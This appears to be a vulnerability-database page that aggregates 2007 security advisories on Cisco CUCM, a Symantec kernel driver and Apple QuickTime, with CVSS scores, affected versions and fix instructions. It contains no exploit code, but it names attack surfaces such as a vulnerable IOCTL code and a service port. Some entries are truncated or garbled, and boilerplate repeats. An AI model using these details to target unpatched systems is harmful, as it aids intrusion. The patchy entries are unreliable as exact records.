VARIoT IoT vulnerabilities database

VAR-200707-0302 | CVE-2007-3776 | CUCM Vulnerability in which important information is obtained |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Manager (CUCM, formerly CallManager) and Unified Presence Server (CUPS) allow remote attackers to obtain sensitive information via unspecified vectors that reveal the SNMP community strings and configuration settings, aka (1) CSCsj20668 and (2) CSCsj25962.
To exploit this issue, an attacker must have administrative access.
Attackers may exploit these issues to gain access to sensitive information or to cause denial-of-service conditions.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerabilities are caused due to unspecified errors and can be
exploited by an unauthorized administrator to e.g. activate and
terminate system services or to view SNMP configuration information
in a CUCM/CUPS cluster environment.
CUCM 5.0/5.1:
Update to CUCM 5.1(2a) -
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-51?psrtdcat20e2
CUPS 1.0:
Upgrade to CUPS 6.0(1) -
http://www.cisco.com/pcgi-bin/tablebuild.pl/cups-60?psrtdcat20e2
Version 1.0 is reportedly discontinued. The vendor recommends users
to upgrade to version 6.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20070711-voip.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0338 | CVE-2006-5277 | CUCM of CTL Provider Vulnerability in arbitrary code execution in service |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Off-by-one error in the Certificate Trust List (CTL) Provider service (CTLProvider.exe) in Cisco Unified Communications Manager (CUCM, formerly CallManager) before 20070711 allow remote attackers to execute arbitrary code via a crafted packet that triggers a heap-based buffer overflow. Cisco Unified Communications Manager is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit these issues to execute arbitrary code within the context of the vulnerable application. Successful exploits may result in a complete compromise of affected servers. Failed exploit attempts will likely result in denial-of-service conditions. A single-byte overflow vulnerability exists in the CTLProvider.exe and RisDC.exe service components of CUCM, which could be exploited by a remote attacker to render the device unusable or take control of the affected system.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Cisco Unified Communications Manager Two Vulnerabilities
SECUNIA ADVISORY ID:
SA26043
VERIFY ADVISORY:
http://secunia.com/advisories/26043/
CRITICAL:
Moderately critical
IMPACT:
DoS, System access
WHERE:
>From local network
SOFTWARE:
Cisco Unified CallManager 5.x
http://secunia.com/product/12535/
Cisco Unified CallManager 4.x
http://secunia.com/product/12534/
Cisco Unified CallManager 3.x
http://secunia.com/product/2805/
Cisco Unified Communications Manager 5.x
http://secunia.com/product/11019/
Cisco Unified Communications Manager 4.x
http://secunia.com/product/5363/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Unified
Communications Manager (CUCM), which can be exploited by malicious
people to cause a DoS (Denial of Service) or potentially compromise a
vulnerable system.
Note: This vulnerability does not affect CUCM 3.x.
2) An integer overflow error in the Real-Time Information Server
(RIS) Data Collector service (RisDC.exe) can be exploited to cause a
heap-based buffer overflow by sending specially crafted packets to
the vulnerable service (default port 2556/TCP).
Successful exploitation may allow execution of arbitrary code.
SOLUTION:
Apply updated versions:
Vulnerability #1 is corrected in CUCM versions 4.1(3)SR5, 4.2(3)SR2,
4.3(1)SR1 and 5.1(2).
Vulnerability #2 is corrected in CUCM versions 3.3(5)SR2b, 4.1(3)SR5,
4.2(3)SR2, 4.3(1)SR1 and 5.1(2).
See vendor advisory for a detailed patch matrix.
PROVIDED AND/OR DISCOVERED BY:
IBM Internet Security Systems X-Force
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20070711-cucm.shtml
IBM Internet Security Systems:
1) http://www.iss.net/threats/270.html
2) http://www.iss.net/threats/271.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0450 | CVE-2007-3673 | Symantec AntiVirus Corporate Edition Etc. Symantec symtdi.sys Vulnerability gained in |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Symantec symtdi.sys before 7.0.0, as distributed in Symantec AntiVirus Corporate Edition 9 through 10.1 and Client Security 2.0 through 3.1, Norton AntiSpam 2005, and Norton AntiVirus, Internet Security, Personal Firewall, and System Works 2005 and 2006; allows local users to gain privileges via a crafted Interrupt Request Packet (Irp) in an IOCTL 0x83022323 request to \\symTDI\, which results in memory overwrite. Applications running the SYMTDI.SYS device driver are prone to a privilege-escalation vulnerability because the driver fails to adequately sanitize user-supplied input.
Local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. A successful exploit will completely compromise affected computers. Failed exploit attempts will likely cause the computer to crash. Symantec AntiVirus is a very popular antivirus solution. instruction. Symantec AntiVirus symtdi.sys Local Privilege Escalation Vulnerability
iDefense Security Advisory 07.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 11, 2007
I. BACKGROUND
Symantec has a wide range of Anti-Virus and Internet Security products
that are designed to protect users from viruses and other harmful
software. More information can be found on the Symantec site at the
following URL.
http://www.symantec.com/
II.
The vulnerability specifically exists due to improper address space
validation when the \\symTDI\ device driver processes IOCTL 0x83022323.
An attacker can overwrite an arbitrary address, including code segments,
with a constant double word value by supplying a specially crafted Irp
to the IOCTL handler function.
III. ANALYSIS
Exploitation allows an attacker to obtain elevated privileges by
exploiting a kernel-mode driver. This could allow the attacker to gain
complete control of the affected system.
Note that since the attacker can only overwrite with a constant
double-word value, exploitation is not completely straight forward.
However, this does not significantly impact the difficulty of
exploitation since code segments can be overwritten within the kernel.
IV. DETECTION
iDefense confirmed this vulnerability in version 5.5.1.6 of Symantec's
symtdi.sys device driver as included with version 10 of Symantec
AntiVirus Corporate Edition. Previous versions and related products
that contain the affected driver are suspected vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workaround for this
issue.
VI. VENDOR RESPONSE
Symantec has addressed this vulnerability by releasing updated versions
of the SymTDI.sys device driver. The updated driver has been made
available via LiveUpdate. For more information consult Symantec's
advisory at the following URL.
http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11d.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3673 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
01/10/2007 Initial vendor notification
01/11/2007 Initial vendor response
07/11/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Zohiartze Herce.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications. Please see the vendor's advisory for
details.
PROVIDED AND/OR DISCOVERED BY:
Zohiartze Herce, reported via iDefense Labs.
ORIGINAL ADVISORY:
Symantec:
http://securityresponse.symantec.com/avcenter/security/Content/2007.07.11d.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=554
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0545 | CVE-2007-2392 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via a crafted movie file that triggers memory corruption. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory. This can be exploited to execute arbitrary
code when a user visits a web site containing a specially crafted
Java applet.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
VAR-200707-0549 | CVE-2007-2397 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
QuickTime for Java in Apple Quicktime before 7.2 does not properly check permissions, which allows remote attackers to disable security controls and execute arbitrary code via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory. This can lead to execution of arbitrary code when a user
visits a web site containing a specially crafted Java applet.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr
4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV
8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ
zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ
+ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8
a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ==
=EV1X
-----END PGP SIGNATURE-----
VAR-200707-0548 | CVE-2007-2396 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The JDirect support in QuickTime for Java in Apple Quicktime before 7.2 exposes certain dangerous interfaces, which allows remote attackers to execute arbitrary code via crafted Java applets. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime of JDirect Is invalid due to a lack of interface.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
>From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
This can be exploited to cause memory corruption and may allow
execution of arbitrary code when a user accesses a specially crafted
H.264 movie.
2) An unspecified error exists in the processing of movie files.
3) An integer overflow error exists in the handling of .m4v files and
can be exploited to execute arbitrary code when a user accesses a
specially crafted .m4v file.
4) An integer overflow error exists in the handling of the "author"
and "title" fields when parsing SMIL files.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
The vulnerabilities are reported in versions prior to 7.2.
SOLUTION:
Update to version 7.2.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
4) David Vaartjes of ITsec Security Services, reported via iDefense.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
For more information, please refer to the Vulnerability Notes
Database.
II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the
subject.
